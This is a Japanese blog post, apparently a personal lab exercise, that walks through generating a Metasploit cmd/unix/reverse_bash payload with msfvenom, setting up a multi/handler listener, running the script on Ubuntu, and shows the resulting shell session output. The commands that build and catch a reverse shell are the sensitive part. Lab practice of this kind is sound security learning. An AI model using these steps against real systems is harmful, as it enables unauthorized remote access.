2024年3月19日火曜日

Metasploit で Ubuntu リバースシェルをしてみた

Metasploit で Ubuntu リバースシェルをしてみた

概要

前回 Windows に対して行ってみました
今回は Ubuntu 環境に対して行ってみます

環境

  • Ubuntu 22.04
  • Metasploit 6.3.60

インストール

こちら

リバースシェルスクリプト生成

payload = cmd/unix/reverse_bash を使います
似たようなペイロードに generic/shell_reverse_tcp や linux/x64/shell_reverse_tcp がありますが形式がバイナリであったり elf 形式でわかりづらいので今回は bash 形式のペイロードを使います

  • msfconsole

msf6> モードになります

  • msfvenom -p cmd/unix/reverse_bash LHOST=192.168.100.2 -f raw -o /home/devops/work/test.sh

192.168.100.2 は Ubuntu のアドレスです

待ち受け

こちらは好きなホストで実施して OK です
リバースシェルを待ち受ける側のホストで実行します

  • msfconsole

msf6> モードになります

  • use exploit/multi/handler
  • set payload cmd/unix/reverse_bash
  • set LHOST 192.168.100.2
  • exploit

動作確認

Ubuntu 側に test.sh を配置して実行権限を与えます

  • chmod +x /home/devops/work/test.sh
  • ./home/devops/work/test.sh

あとは実行すると待ち受け側でコマンドが実行できることが確認できます

[*] Started reverse TCP handler on 192.168.100.2:4444
[*] Command shell session 2 opened (192.168.100.2:4444 -> 192.168.100.2:41490) at 2024-03-13 16:55:59 +0900

pwd
/home/devops/work
uname -an
Linux ubuntu01 5.15.0-92-generic #102-Ubuntu SMP Wed Jan 10 09:33:48 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux

最後に

Metasploit を使って Ubuntu に対してリバースシェルを行ってみました
生成されるシェルスクリプトはかなりシンプルなファイルなのでわざわざ Metasploit を使わなくても OK ですが Metasploit に慣れるためにそうしています

参考サイト

0 件のコメント:

コメントを投稿